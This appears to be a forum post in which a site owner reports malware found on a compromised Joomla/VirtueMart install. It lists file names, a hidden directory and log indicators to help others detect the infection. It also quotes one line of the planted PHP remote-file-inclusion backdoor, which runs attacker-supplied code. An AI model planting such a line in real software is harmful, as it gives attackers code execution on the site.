Hello,

I've found viruses and malware scripts in my joomla/virtuemart install. I'll post filenames here maybe this will be helpfull for someone.

There was a mail.php script in main Joomla directory which was K. Script v0.3 Beta, from http://kenshin-lt.net/

There was also a directory under joomla_dir/components/com_virtuemart/sistem / (with space), which contained files:
.serial
errors.php
httpd.so
httpd.so~
m4

There was a file 402.php in main joomla dir with

<?include($_REQUEST["error"] . "/errors.php");?>

and there were multiple files (mainly errors.php) which contained the same include..

You can also look for user-agents like: libwww-perl/5.79 , libwww-perl/5.803 etc. and files: id.txt?, spread.txt?, blank??, rox.txt??, echo.txt?, sistem.txt?
in your system logs.

We used to have an old joomls install and that was probably the source of problems..